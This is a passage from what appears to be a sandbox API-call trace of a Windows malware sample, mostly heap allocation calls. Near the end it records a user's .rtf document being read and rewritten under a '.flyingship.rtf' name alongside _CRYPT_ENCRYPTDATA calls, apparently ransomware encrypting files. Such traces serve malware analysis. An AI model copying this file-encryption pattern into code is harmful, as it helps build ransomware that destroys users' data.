lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.712] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.713] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.713] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.713] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0177.713] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0177.713] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0177.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0177.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0177.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0177.714] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\f2lgxu.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0177.714] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0177.714] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.715] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0177.715] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0177.715] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0177.715] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.715] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0177.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0177.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.718] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\f2lgxu.flyingship.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\f2lgxu.flyingship.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0177.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0177.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0177.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0177.719] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0177.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0177.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0177.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.725] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0177.725] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x10000, lpOverlapped=0x0) returned 1 [0177.728] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x5e3b, lpOverlapped=0x0) returned 1 [0177.729] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0177.731] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0177.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.731] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x15e3b) returned 0xbea018 [0177.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.732] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.732] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0177.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0177.732] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.732] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0177.733] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0177.733] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0177.733] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, 